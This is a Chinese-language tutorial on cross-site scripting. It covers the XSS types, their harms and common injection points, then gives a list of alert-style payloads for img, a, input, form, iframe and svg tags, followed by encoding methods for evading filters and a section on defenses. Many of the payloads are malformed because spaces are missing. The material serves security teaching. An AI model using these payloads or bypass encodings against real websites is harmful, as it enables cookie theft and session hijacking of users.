XSS是什么?
XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。
XSS会造成那些危害?
攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用户。当一个Web程序的用户输入点没有进行校验和编码,将很容易的导致XSS。
网络钓鱼,包括获取各类用户账号;
窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;
劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、强制发表日志、电子邮件等;
强制弹出广告页面、刷流量等;
网页挂马;
进行恶意操作,如任意篡改页面信息、删除文章等;
进行大量的客户端攻击,如ddos等;
获取客户端信息,如用户的浏览历史、真实ip、开放端口等;
控制受害者机器向其他网站发起攻击;
结合其他漏洞,如csrf,实施进一步危害;
提升用户权限,包括进一步渗透网站;
传播跨站脚本蠕虫等
XSS是如何产生的
通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。
XSS常见出现漏洞的地方
-
数据交互的地方
get、post、cookies、headers
反馈与浏览
富文本编辑器
各类标签插入和自定义
数据输出的地方
用户资料
关键词、标签、说明
文件上传
XSS的分类
反射性XSS
存储型XSS
DOM型XSS
反射性XSS
又称非持久型XSS,这种攻击方式往往具有一次性,只在用户单击时触发。
常见注入点
网站的搜索栏、用户登录入口、输入表单等地方,常用来窃取客户端cookies或钓鱼欺骗。
攻击方式
攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当目标用户访问该链接时,服务器接受该目标用户的请求并进行处理,然后服务器把带有XSS的代码发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。
存储型XSS
又称持久型XSS,比反射型XSS更具有威胁性,并且可能影响到Web服务器自身的安全。攻击脚本将被永久的存放在目标服务器的数据库或文件中。
常见注入点
论坛、博客、留言板、网站的留言、评论、日志等交互处。
攻击方式
攻击者在发帖或留言的过程中,将恶意脚本连同正常信息一起注入到发布内容中。随着发布内容被服务器存储下来,恶意脚本也将永久的存放到服务器的后端存储器中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本就会在用户的浏览器中得到执行。
DOM型XSS
DOM(Document object model),使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。
DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象的一种漏洞。DOM型XSS是基于js上的。不需要与服务器进行交互。
注入点
通过js脚本对对文档对象进行编辑,从而修改页面的元素。也就是说,客户端的脚本程序可以DOM动态修改页面的内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器d端交互,它只发生在客户端处理数据的阶段。
攻击方式
用户请求一个经过专门设计的URL,它由攻击者提供,而且其中包含XSS代码。服务器的响应不会以任何形式包含攻击者的脚本,当用户的浏览器处理这个响应时,DOM对象就会处理XSS代码,导致存在XSS漏洞。
常见标签
<img>标签
利用方式1
<imgsrc=javascript:alert(“xss”)>
<IMGSRC=javascript:alert(String.formCharCode(88,83,83))>
<imgscr=“URL”style=‘Xss:expression(alert(/xss));’
<!–CSS标记xss–>
<imgSTYLE=“background-image:url(javascript:alert(‘XSS’))”>
XSS利用方式2
<imgsrc=“x”onerror=alert(1)>
<imgsrc=“1”onerror=eval(“alert(‘xss’)”)>
XSS利用方式3
<imgsrc=1onmouseover=alert(‘xss’)>
<a>标签
标准格式
<ahref=“https://www.baidu.com”>baidu</a>
XSS利用方式1
<ahref=“javascript:alert(‘xss’)”>aa</a>
<ahref=javascript:eval(alert(‘xss’))>aa</a>
<ahref=“javascript:aaa”onmouseover=“alert(/xss/)”>aa</a>
XSS利用方式2
<script>alert(‘xss’)</script>
<ahref=“”onclick=alert(‘xss’)>aa</a>
利用方式3
<ahref=“”onclick=eval(alert(‘xss’))>aa</a>
利用方式4
<ahref=kycg.asp?ttt=1000onmouseover=prompt(‘xss’)y=2016>aa</a>
input标签
标准格式
<inputname=“name”value=“”>
利用方式1
<inputvalue=“”onclick=alert(‘xss’)type=“text”>
利用方式2
<inputname=“name”value=“”onmouseover=prompt(‘xss’)bad=“”>
利用方式4
<inputname=“name”value=“”><script>alert(‘xss’)</script>
<form>标签
XSS利用方式1
<formaction=javascript:alert(‘xss’)method=“get”>
<formaction=javascript:alert(‘xss’)>
XSS利用方式2
<formmethod=postaction=aa.asp?onmouseover=prompt(‘xss’)>
<formmethod=postaction=aa.asp?onmouseover=alert(‘xss’)>
<formaction=1onmouseover=alert(‘xss)>
XSS利用方式3
<!–原code–>
<formmethod=postaction=“data:text/html;base64,<script>alert(‘xss’)</script>”>
<!–base64编码–>
<formmethod=postaction=“data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=”>
<iframe>标签
XSS利用方式1
<iframesrc=javascript:alert(‘xss’);height=5width=1000/><iframe>
XSS利用方式2
<iframesrc=“data:text/html,<script>alert(‘xss’)</script>”></iframe>
<!–原code–>
<iframesrc=“data:text/html;base64,<script>alert(‘xss’)</script>”>
<!–base64编码–>
<iframesrc=“data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=”>
XSS利用方式3
<iframesrc=“aaa”onmouseover=alert(‘xss’)/><iframe>
XSS利用方式3
<iframesrc=“javascript:prompt(`xss`)”></iframe>
svg<>标签
<svgonload=alert(1)>
XSS编码绕过
js编码
HTML实体编码
URL编码
String.fromCharCode编码
在线xss转码:https://www.toolmao.com/xsstranser
JS编码
JS提供了四种字符编码的策略,
三个八进制数字,如果数字不够,在前面补零,如a的编码为\141
两个十六进制数字,如果数字不够,在前面补零,如a的编码为\x61
四个十六进制数字,如果数字不够,在前面补零,如a的编码为\u0061
对于一些控制字符,使用特殊的C类型的转义风格,如\n和\r
HTML实体编码
命名实体
以&开头,以分号结尾的,如<的编码为&1t;
字符编码
十进制,十六进制的ASCII码或者Unicode字符编码。样式为&#数值;
如<的编码为
<(10进制)
<(16进制)
URL编码
这里为url全编码,也就是两次url编码
如alert的url全编码为%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34
String.fromCharCode编码
如alert的编码为String.fromCharCode(97,108,101,114,116)
XSS的防御
使用XSS Filter
输入过滤
-
输入验证
对用户提交的数据进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此以外的其他任何数据。
常见的检测或过滤:
输入是否仅仅包含合法的字符
输入字符串是否超过最大长度的限制
输入如果为数字,数字是否在指定的范围内
输入是否符合特定的格式要求,如邮箱、电话号码、ip地址等
数据消毒
除了在客户端验证数据的合法性,输入过滤中最重要的还是过滤和净化有害的输入,例如如下常见的敏感字符:
||<> ‘ “&# javascript expression
输出编码
对输出的数据进行编码,如HTML编码,就是让可能造成危害的信息变成无害。
白名单和黑名单
定制过滤策略
web安全编码规范
防御DOM-Based XSS
两点注意点:
-
避免客户端文档重写、重定向或其他敏感操作,同时避免使用客户端数据,这些操作尽量在服务端使用动态页面来实现。
-
分析和强化客户端Javascript代码,尤其是一些受到影响的Dom对象
其他防御方式
Anti_XSS
微软开发的,.Net平台下的,用于方式XSS攻击的类库,它提供了大量的编码函数来对用户输入的数据进行编码,可以实现基于白名单的输入的过滤和输出编码。
HttpOnly Cookie
当Cookie在消息头中被设置为HttpOnly时,这样支持Cookie的浏览器将阻止客户端Javascript直接访问浏览器中的cookies,从而达到保护敏感数据的作用。
Noscript
Noscript是一款免费的开源插件,该插件默认禁止所有脚本,但可以自定义设置允许通过的脚本。
WAF
使用WAF,比如软WAF,硬WAF、云WAF等。
交流qq:3542167150
来源:freebuf.com 2021-07-13 00:08:56 by: 白色的空盒子
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666